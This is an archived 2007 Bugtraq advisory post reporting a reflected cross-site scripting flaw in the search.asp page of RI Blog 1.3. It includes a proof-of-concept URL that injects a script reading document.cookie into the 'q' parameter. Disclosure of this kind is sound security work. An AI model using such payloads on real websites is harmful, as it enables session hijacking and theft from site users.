[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RI Blog 1.3 XSS Vuln.
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: RI Blog 1.3 XSS Vuln.
- From: ShaFuq31@xxxxxxxxxxx
- Date: 5 Jan 2007 16:56:04 -0000
# BhhGroup.Org & Bilgi-Yonetimi.Org.Tr
# script name : RI Blog 1.3
# Script Download : http://www.aspindir.com/indir.asp?id=4098
# Risk : High
# Found By : ShaFuck31
# Vulnerable file : search.asp
# Vulnerable : http://www.victim.com/BlogPath/search.asp?q=[XSS]
# ExampLe :
http://www.victim.com/BlogPath/search.asp?q=<script>alert(document.cookie);</script>
#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]